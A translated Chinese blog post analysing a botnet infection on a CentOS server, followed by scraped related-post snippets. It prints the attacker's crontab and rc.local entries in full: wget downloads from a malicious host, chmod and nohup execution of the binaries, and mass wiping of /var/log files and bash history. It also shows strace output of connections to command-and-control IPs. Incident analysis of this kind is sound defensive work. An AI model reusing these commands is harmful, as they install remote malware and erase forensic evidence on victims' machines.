1. 程式人生 > >基於Linux平臺下的僵屍網路病毒《比爾蓋茨》

基於Linux平臺下的僵屍網路病毒《比爾蓋茨》

image

感覺分析的很好,所以決定翻譯出來,希望和大家多多交流O(∩_∩)O~

轉載請註明出處:http://blog.csdn.net/u010484477     O(∩_∩)O謝謝

關鍵字:病毒,linux,資訊保安

我昨天寫的日誌裡面提到,家用路由器在x86的CentOS系統下奇怪的自己行動,像是在自己載入處理器。於是我決定爬上去看看,在那裡發生了什麼,然後我馬上意識到有人爬到伺服器和掛在程序中的dgnfd564sdf.com。主要是下面幾個方面atddd,cupsdd,cupsddh, ksapdd, kysapdd, skysapdd , xfsdxd等等

root      4741
0.0 0.0 41576 2264 ? S 21:00 0:00 wget http://www.dgnfd564sdf.com:8080/sksapd root 4753 0.0 0.0 41576 2268 ? S 21:00 0:00 wget http://www.dgnfd564sdf.com:8080/xfsdx root 4756 0.0 0.0 41576 2264 ? S 21:00 0:00 wget http://www.dgnfd564sdf.com:8080/cupsdd root 4757 0.0 0.0 41576 2268
? S 21:00 0:00 wget http://www.dgnfd564sdf.com:8080/kysapd root 4760 0.0 0.0 41576 2264 ? S 21:00 0:00 wget http://www.dgnfd564sdf.com:8080/ksapd root 4764 0.0 0.0 41576 2268 ? S 21:00 0:00 wget http://www.dgnfd564sdf.com:8080/atdd root 4767 0.0 0.0 41576 2264 ? S 21:00 0
:00 wget http://www.dgnfd564sdf.com:8080/skysapd
啟動分析

起初我摸索著看,到底是什麼讓我的電腦如此的妥協。第一件事,我想到/ etc / rc.local檢查。有如下:

cd /etc;./ksapdd
cd /etc;./kysapdd
cd /etc;./atddd
cd /etc;./ksapdd
cd /etc;./skysapdd
cd /etc;./xfsdxd
“嗯,我想從root那下手,就像這樣:
# crontab -e
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
#
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
#
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),*/1 * * * * killall -9 nfsd4
…
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.*/1 * * * * killall -9 profild.key
…
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').#
# Notice that tasks will be started based on the cron's system*/1 * * * * killall -9 DDosl
*/1 * * * * killall -9 lengchao32
*/1 * * * * killall -9 b26
*/1 * * * * killall -9 codelove
*/1 * * * * killall -9 32
*/1 * * * * killall -9 64
*/1 * * * * killall -9 new6
*/1 * * * * killall -9 new4
*/1 * * * * killall -9 node24
*/1 * * * * killall -9 freeBSD
*/99 * * * * killall -9 kysapd
*/98 * * * * killall -9 atdd
*/97 * * * * killall -9 kysapd
*/96 * * * * killall -9 skysapd
*/95 * * * * killall -9 xfsdx
*/94 * * * * killall -9 ksapd
…
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').#*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/atdd
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/cupsdd
*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/kysapd
*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/sksapd
*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/skysapd
*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/xfsdx
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/ksapd
*/120 * * * * cd /root;rm -rf dir nohup.out
…
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line*/360 * * * * cd /etc;rm -rf dir atdd
*/360 * * * * cd /etc;rm -rf dir ksapd
*/360 * * * * cd /etc;rm -rf dir kysapd
*/360 * * * * cd /etc;rm -rf dir skysapd
*/360 * * * * cd /etc;rm -rf dir sksapd
*/360 * * * * cd /etc;rm -rf dir xfsdx
*/1 * * * * cd /etc;rm -rf dir cupsdd.*
*/1 * * * * cd /etc;rm -rf dir atdd.*
*/1 * * * * cd /etc;rm -rf dir ksapd.*
*/1 * * * * cd /etc;rm -rf dir kysapd.*
*/1 * * * * cd /etc;rm -rf dir skysapd.*
*/1 * * * * cd /etc;rm -rf dir sksapd.*
*/1 * * * * cd /etc;rm -rf dir xfsdx.*
*/1 * * * * chmod 7777 /etc/atdd
*/1 * * * * chmod 7777 /etc/cupsdd
*/1 * * * * chmod 7777 /etc/ksapd
*/1 * * * * chmod 7777 /etc/kysapd
*/1 * * * * chmod 7777 /etc/skysapd
*/1 * * * * chmod 7777 /etc/sksapd
*/1 * * * * chmod 7777 /etc/xfsdx
*/99 * * * * nohup /etc/cupsdd > /dev/null 2>&1&
*/100 * * * * nohup /etc/kysapd > /dev/null 2>&1&
*/99 * * * * nohup /etc/atdd > /dev/null 2>&1&
…
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line*/98 * * * * nohup /etc/kysapd > /dev/null 2>&1&
*/97 * * * * nohup /etc/skysapd > /dev/null 2>&1&
*/96 * * * * nohup /etc/xfsdx > /dev/null 2>&1&
*/95 * * * * nohup /etc/ksapd > /dev/null 2>&1&
*/1 * * * * echo "unset MAILCHECK" >> /etc/profile
*/1 * * * * rm -rf /root/.bash_history
*/1 * * * * touch /root/.bash_history
*/1 * * * * history -r
*/1 * * * * cd /var/log > dmesg 
*/1 * * * * cd /var/log > auth.log 
*/1 * * * * cd /var/log > alternatives.log 
*/1 * * * * cd /var/log > boot.log 
*/1 * * * * cd /var/log > btmp 
*/1 * * * * cd /var/log > cron 
…
…
*/1 * * * * cd /var/log > cups 
*/1 * * * * cd /var/log > daemon.log 
*/1 * * * * cd /var/log > dpkg.log 
*/1 * * * * cd /var/log > faillog 
*/1 * * * * cd /var/log > kern.log 
*/1 * * * * cd /var/log > lastlog
*/1 * * * * cd /var/log > maillog 
*/1 * * * * cd /var/log > user.log 
*/1 * * * * cd /var/log > Xorg.x.log 
*/1 * * * * cd /var/log > anaconda.log 
*/1 * * * * cd /var/log > yum.log 
*/1 * * * * cd /var/log > secure
*/1 * * * * cd /var/log > wtmp
*/1 * * * * cd /var/log > utmp 
*/1 * * * * cd /var/log > messages
*/1 * * * * cd /var/log > spooler
*/1 * * * * cd /var/log > sudolog
*/1 * * * * cd /var/log > aculog
*/1 * * * * cd /var/log > access-log
*/1 * * * * cd /root > .bash_history
*/1 * * * * history -c
…
# Edit this file to introduce tasks to be run by cron.
#
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
哦。他是183кб4036大小,行。你見過183кб crontab的大小嗎?就像我所看到的這樣。

當我進入到伺服器,這些過程已經不是什麼都不做(不被處理器,沒有使用網路)。他們已經決定停止執行,恢復業務,不讓這些現有的特徵一直存在,防止被人發現。他們的strace命令就是這樣的:
[[email protected] etc]# strace -p 3312
Process 3312 attached - interrupt to quit
[ Process PID=3312 runs in 32 bit mode. ]
restart_syscall(<... resuming interrupted call ...>) = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
setsockopt(3, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0
setsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0
fcntl64(3, F_GETFL)                     = 0x2 (flags O_RDWR)
fcntl64(3, F_SETFL, O_RDWR|O_NONBLOCK)  = 0
connect(3, {sa_family=AF_INET, sin_port=htons(10991), sin_addr=inet_addr("116.10.189.246")}, 16) = -1 EINPROGRESS (Operation now in progress)
fcntl64(3, F_GETFL)                     = 0x802 (flags O_RDWR|O_NONBLOCK)
fcntl64(3, F_SETFL, O_RDWR)             = 0
setsockopt(3, SOL_SOCKET, SO_SNDBUF, [0], 4) = 0
setsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0
setsockopt(3, SOL_SOCKET, SO_SNDTIMEO, "\17\0\0\0\0\0\0\0", 8) = 0
send(3, "R\r\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0Linux 2.6.32-35"..., 401, 0) = -1 ECONNREFUSED (Connection refused)
close(3)                                = 0
nanosleep({15, 0}, NULL)                = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
setsockopt(3, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0
setsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0
fcntl64(3, F_GETFL)                     = 0x2 (flags O_RDWR)
fcntl64(3, F_SETFL, O_RDWR|O_NONBLOCK)  = 0
connect(3, {sa_family=AF_INET, sin_port=htons(10991), sin_addr=inet_addr("116.10.189.246")}, 16) = -1 EINPROGRESS (Operation now in progress)
fcntl64(3, F_GETFL)                     = 0x802 (flags O_RDWR|O_NONBLOCK)
fcntl64(3, F_SETFL, O_RDWR)             = 0
setsockopt(3, SOL_SOCKET, SO_SNDBUF, [0], 4) = 0
setsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0
setsockopt(3, SOL_SOCKET, SO_SNDTIMEO, "\17\0\0\0\0\0\0\0", 8) = 0
send(3, "R\r\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0Linux 2.6.32-35"..., 401, 0) = -1 ECONNREFUSED (Connection refused)
close(3)                                = 0
nanosleep({15, 0}, 


[[email protected] etc]# strace -p 3268
Process 3268 attached - interrupt to quit
[ Process PID=3268 runs in 32 bit mode. ]
recv(3, 0xfff19338, 4, 0)               = -1 ECONNRESET (Connection reset by peer)
close(3)                                = 0
futex(0x816e8a8, FUTEX_WAKE, 1)         = 1
futex(0x816e8a4, FUTEX_WAKE, 1)         = 1
nanosleep({15, 0}, NULL)                = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
setsockopt(3, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0
setsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0
fcntl64(3, F_GETFL)                     = 0x2 (flags O_RDWR)
fcntl64(3, F_SETFL, O_RDWR|O_NONBLOCK)  = 0
connect(3, {sa_family=AF_INET, sin_port=htons(10991), sin_addr=inet_addr("112.90.22.197")}, 16) = -1 EINPROGRESS (Operation now in progress)
fcntl64(3, F_GETFL)                     = 0x802 (flags O_RDWR|O_NONBLOCK)
fcntl64(3, F_SETFL, O_RDWR)             = 0
setsockopt(3, SOL_SOCKET, SO_SNDBUF, [0], 4) = 0
setsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0
setsockopt(3, SOL_SOCKET, SO_SNDTIMEO, "\17\0\0\0\0\0\0\0", 8) = 0
send(3, "R\r\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0Linux 2.6.32-35"..., 401, 0) = 401
setsockopt(3, SOL_SOCKET, SO_RCVTIMEO, "<\0\0\0\0\0\0\0", 8) = 0
recv(3, "\4\0\0\0", 4, 0)               = 4
setsockopt(3, SOL_SOCKET, SO_SNDTIMEO, "\17\0\0\0\0\0\0\0", 8) = 0
send(3, "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 27, 0) = 27
setsockopt(3, SOL_SOCKET, SO_RCVTIMEO, "<\0\0\0\0\0\0\0", 8) = 0
recv(3, "\4\0\0\0", 4, 0)               = 4
setsockopt(3, SOL_SOCKET, SO_SNDTIMEO, "\17\0\0\0\0\0\0\0", 8) = 0
send(3, "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\1\0\0\0\0\0\0\0", 27, 0) = 27
setsockopt(3, SOL_SOCKET, SO_RCVTIMEO, "<\0\0\0\0\0\0\0", 8) = 0
recv(3, ^C <unfinished ...>
Process 3268 detached
在這個過程看起來他們幾乎什麼都沒做,只是偶爾進行的資料採集。當然,他們也刷了刷/ etc / rc.local crontab,這些可執行檔案(他們都有SUID位,使得他們有能力進行他們想做的事,但是他為什麼沒有刪除,也沒有改變?),只是刷了/ etc /profile
unset MAILCHECK

這意味著在計算機上的僵屍網路是大約7小時。可能實際上沒有那麼多,但不低。

現在需要檢查是否已修改任何系統檔案。在CentOS這足夠的執行:

rpm -Va
我很高興該命令輸出了和我預想一樣的東西:
[[email protected] ~]# rpm -Va
S.5....T.  c /etc/ppp/chap-secrets
S.5....T.  c /etc/issue
S.5....T.  c /etc/crontab
S.5....T.  c /etc/nagiosgraph/access.conf
S.5....T.  c /etc/nagiosgraph/nagiosgraph.conf
.M.......    /usr/lib/nagiosgraph/cgi-bin/show.cgi
.M.......    /usr/lib/nagiosgraph/cgi-bin/showconfig.cgi
.M.......    /usr/lib/nagiosgraph/cgi-bin/showgraph.cgi
.M.......    /usr/lib/nagiosgraph/cgi-bin/showgroup.cgi
.M.......    /usr/lib/nagiosgraph/cgi-bin/showhost.cgi
.M.......    /usr/lib/nagiosgraph/cgi-bin/showservice.cgi
.M.......    /usr/lib/nagiosgraph/cgi-bin/testcolor.cgi
.M.......    /usr/share/nagiosgraph/htdocs/nagiosgraph.css
.M.......    /usr/share/nagiosgraph/htdocs/nagiosgraph.js
S.5....T.    /var/log/nagiosgraph/nagiosgraph-cgi.log
S.5....T.    /var/log/nagiosgraph/nagiosgraph.log
missing     /usr/java/jre1.7.0_40/lib/install.jar
....L....    /lib/modules/2.6.32-358.2.1.el6.x86_64/build
S.5....T.  c /etc/tor/torrc
.M.......    /
.......T.  c /etc/ppp/options.pptpd
S.5....T.  c /etc/pptpd.conf
....L....  c /etc/pam.d/fingerprint-auth
....L....  c /etc/pam.d/password-auth
....L....  c /etc/pam.d/smartcard-auth
....L....  c /etc/pam.d/system-auth
S.5....T.  c /etc/rsyslog.conf
S.5....T.  c /etc/rc.d/rc.local
..5....T.  c /etc/sysctl.conf
S.5....T.  c /etc/vsftpd/vsftpd.conf
.M.......    /var/ftp/pub
..5....T.  c /etc/sysconfig/PlexMediaServer
.......T.    /usr/lib/plexmediaserver/start.sh
S.5....T.  c /etc/sysconfig/lm_sensors
S.5....T.  c /etc/php.ini
S.5....T.  c /etc/httpd/conf/httpd.conf
.......T.    /etc/rc.d/init.d/deluge-daemon
S.5....T.  c /etc/cacti/db.php
S.5....T.  c /etc/cron.d/cacti
S.5....T.  c /etc/httpd/conf.d/cacti.conf
.M.......    /usr/share/cacti
.M.......    /usr/share/cacti/about.php
.M.......    /usr/share/cacti/auth_changepassword.php
.M.......    /usr/share/cacti/auth_login.php
.M.......    /usr/share/cacti/cdef.php
.M.......    /usr/share/cacti/cmd.php
.M.......    /usr/share/cacti/color.php
.M.......    /usr/share/cacti/data_input.php
.M.......    /usr/share/cacti/data_queries.php
.M.......    /usr/share/cacti/data_sources.php
.M.......    /usr/share/cacti/data_templates.php
.M.......    /usr/share/cacti/gprint_presets.php
.M.......    /usr/share/cacti/graph.php
.M.......    /usr/share/cacti/graph_image.php
.M.......    /usr/share/cacti/graph_settings.php
.M.......    /usr/share/cacti/graph_templates.php
.M.......    /usr/share/cacti/graph_templates_inputs.php
.M.......    /usr/share/cacti/graph_templates_items.php
.M.......    /usr/share/cacti/graph_view.php
.M.......    /usr/share/cacti/graph_xport.php
.M.......    /usr/share/cacti/graphs.php
.M.......    /usr/share/cacti/graphs_items.php
.M.......    /usr/share/cacti/graphs_new.php
.M.......    /usr/share/cacti/host.php
.M.......    /usr/share/cacti/host_templates.php
.M.......    /usr/share/cacti/images
.M.......    /usr/share/cacti/images/arrow.gif
.M.......    /usr/share/cacti/images/auth_deny.gif
.M.......    /usr/share/cacti/images/auth_login.gif
.M.......    /usr/share/cacti/images/auth_logout.gif
.M.......    /usr/share/cacti/images/button_add.gif
.M.......    /usr/share/cacti/images/button_cancel.gif
.M.......    /usr/share/cacti/images/button_cancel2.gif
.M.......    /usr/share/cacti/images/button_clear.gif
.M.......    /usr/share/cacti/images/button_colapse_all.gif
.M.......    /usr/share/cacti/images/button_create.gif
.M.......    /usr/share/cacti/images/button_default.gif
.M.......    /usr/share/cacti/images/button_delete.gif
.M.......    /usr/share/cacti/images/button_expand_all.gif
.M.......    /usr/share/cacti/images/button_export.gif
.M.......    /usr/share/cacti/images/button_go.gif
.M.......    /usr/share/cacti/images/button_help.gif
.M.......    /usr/share/cacti/images/button_import.gif
.M.......    /usr/share/cacti/images/button_no.gif
.M.......    /usr/share/cacti/images/button_purge.gif
.M.......    /usr/share/cacti/images/button_refresh.gif
.M.......    /usr/share/cacti/images/button_save.gif
.M.......    /usr/share/cacti/images/button_view.gif
.M.......    /usr/share/cacti/images/button_yes.gif
.M.......    /usr/share/cacti/images/cacti_about_logo.gif
.M.......    /usr/share/cacti/images/cacti_backdrop.gif
.M.......    /usr/share/cacti/images/cacti_backdrop2.gif
.M.......    /usr/share/cacti/images/cacti_logo.gif
.M.......    /usr/share/cacti/images/calendar.gif
.M.......    /usr/share/cacti/images/delete_icon.gif
.M.......    /usr/share/cacti/images/delete_icon_large.gif
.M.......    /usr/share/cacti/images/disable_icon.png
.M.......    /usr/share/cacti/images/enable_icon.png
.M.......    /usr/share/cacti/images/enable_icon_disabled.png
.M.......    /usr/share/cacti/images/favicon.ico
.
            
           

相關推薦

基於Linux平臺網路病毒比爾

感覺分析的很好,所以決定翻譯出來,希望和大家多多交流O(∩_∩)O~ 轉載請註明出處:http://blog.csdn.net/u010484477     O(∩_∩)O謝謝 關鍵字:病毒,linux,資訊保安 我昨天寫的日誌裡面提到,家用路由器在x86的

基於Linux平臺網路病毒Tsunami原始碼解析(病毒功能挺經典的)

 最近在進行病毒樣本的解析,無意間看到了Tsunami病毒的原始碼,進行了一次解析,和大家共同交流  轉載請註明出處:http://blog.csdn.net/u010484477     O(∩_∩)O謝謝   /*     * !* SH uname -a *   

新的網路病毒出現,感染“HDFS”發動DDoS功擊

我們都知道,DDOS功擊主要是通過大量的“肉雞”來進行發動的,要發動DDOS功擊首先需要大量的僵屍網路“肉雞”。根據相關媒體最新報道,一個全新的僵屍網路病毒正在以“HDFS”為目標,感染其成為“肉雞”,利用它們的計算能力發動分散式拒絕服務(DDoS)功擊。 什麼是“HDFS”呢?“HDFS”的全稱是

基於Linux平臺病毒Wirenet.c解析

在分析Wirenet.c時,感覺自己學到了很多很讚的思想,希望跟大家一同交流。 這次並不想通篇的進行分析了,我想寫出兩塊病毒的惡意程式碼,覺得思想挺好的。 一、刪除某目錄下的所有檔案 pathpoint = opendir(path);  //開啟一個目錄 dirent

BOTCHAIN:第一個基於比特幣協議的功能齊全的網路

前言 近期,來自Cybaze公司ZLab惡意軟體實驗室的安全專家Antonio Pirozzi和Pierluigi Paganini介紹了一款名叫BOTCHAIN的僵屍網路,而它是世界上第一款基於比特幣協議構建的全功能僵屍網路。 區塊鏈技術能夠以可靠的方式驗證通訊雙方

Linux平臺基於BitTorrent應用層協議的下載軟體開發--Main函式模組(main.c)

#include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #include <malloc.h> #include

linux平臺基於C語言實現遍歷檔案目錄

#include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <string.h&g

Oracle基於Linux 7的安裝

oracle linux 一、環境:1、WMware Workstation2、linux 7.0 64位 iso3、安裝包:p13390677_112040_Linux-x86-64_1of7.zipp13390677_112040_Linux-x86-64_2of7.zip二、創建新虛擬機:文件-

linux平臺防火墻iptables原理(轉)

arch inux 方式 輸出結果 取反 地址 angle 啟動 internet iptables簡介 netfilter/iptables(簡稱為iptables)組成Linux平臺下的包過濾防火墻,與大多數的Linux軟件一樣,這個包過濾防火墻是免費的,它可以

Linux系統基礎知識(二)基於linux系統的用戶管理操作以及文件操作補充

c99 數據塊 upa 系統數據 精確 passwd 列表 sudo 3.4 1、(思考)系統中為什麽要有用戶 1.1用戶??系統中最底層的安全設定,回收(限制)權利。1.2組??共享權利。分為以下兩種:??(1)附加組:由用戶決定的組(每個用戶不一定都有);??(2)初始

最新Chalubo網路來襲,目標指向伺服器和物聯網裝置

網路安全公司Sophos旗下SophosLabs在本週一(10月22日)發表的一篇博文中指出,他們近兩個月一直在持續關注一場開始於9月初的網路攻擊活動,目標是開啟了SSH伺服器的Linux伺服器。而在這場攻擊活動中,攻擊者的主要目的在於傳播一種被他們稱之為“Chalubo”的最新自動化DDos攻擊工

Python指令碼暴力破解SSH口令以及構建網路(pxssh)

目錄 暴力破解SSH口令 SSH遠端執行命令 構建僵屍網路 環境:Kali Linux  python 2.7.13 暴力破解SSH口令 Pxssh是pexpect庫的ssh專用指令碼,他能用預先寫好的 login()、logout() 和 pro

曲速未來 訊息|俄羅斯最新的MaaS網路:Black Rose Lucy

前言:   區塊鏈安全公司 曲速未來 表示:近年來我們看到網路犯罪分子越來越多地聘請網路僱傭兵和惡意軟體即服務(MaaS)提供商作為開展惡意活動的一種方式,從而更加註意這一建議。許多威脅演員更傾向於僱用具有更專業技能的較小團隊,而不是聚集擁有完全從頭開始攻擊所需的必要技能組的全能團

曲速未來 披露:新的網路隱藏在區塊鏈DNS霧中並刪除Cryptominer

DNS (域名系統)   DNS代表域名服務,它是網際網路的電話簿。將域名(如amazon.com)對映到IP地址(如123.456.789)的域名系統(DNS)。域名系統通過編號分配機構ICANN和註冊服務商進行偽分散治理。雖然不是盡善盡美,但我們必須要讚揚它,作為網際網路基礎設

學習筆記(十):使用支援向量機區分網路DGA家族

1.資料蒐集和資料清洗       ·1000個cryptolocker域名       ·1000個post-tovar-goz域名       ·alexa前1000域名   &n

HNS物聯網網路現在通過Wi-Fi使用ADB傳播到新的Android裝置

據Bitdefender實驗室報道,新的Hide and Seek變種能夠通過利用Android開發人員用於故障排除的Android除錯橋(ADB)功能在網路中招募新機器人。 雖然並非所有的Android裝置都預設啟用ADB,但是一些Android廠商決定讓它自動啟用,通過5555使用Wi-Fi ADB遠端

byob--建立自己的網路

BYOB是一個開源專案,為安全研究人員和開發人員提供構建和執行基本僵屍網路的框架,以加深他們對每年感染數百萬裝置併產生現代僵屍網路的複雜惡意軟體的理解,以提高他們的能力,制定應對這些威脅的對策。 它旨在允許開發人員輕鬆實現自己的程式碼並新增新功能,而無需從頭開始編寫RAT(遠端管理工具)或 C2(命令和控制

Golang 入門基礎教程(二)Linux 平臺安裝Golang基礎環境

Linux平臺下安裝Golang的話可以直接下載官方原始碼包, 注意:如果系統內安裝過其他版本的Golang原始碼包,必須先將之前的清除掉 1、解壓原始碼包 解壓原始碼包到 /usr/local目錄下 > sudo tar -C /usr/local

Linux平臺下載百度網盤裡的資源

工作中大部分使用的是Linux系統,經常會遇到需要下載資源的情況,這時候就懵逼了,Linux下根本沒有百度網盤客戶端啊,雖然可以隨時切換到windows環境下,繼續下載,但是終歸不是好辦法。所以今天就特意找了下相關方法,一搜還真多,七七八八的都不知道選哪個好。看上去都是比較複雜又要搞原始碼又要搞配置

Linux 平臺的漏洞掃描器 Vuls

Vuls 是一款適用於 Linux/FreeBSD 的漏洞掃描程式,無代理,採用 Go 語言編寫,對於系統管理員來說,每天必須執行安全漏洞分析和軟體更新都是一個負擔。 為避免生產環境宕機,系統管理員通常選擇不使用軟體包管理器提供的自動更新選項,而是手動執行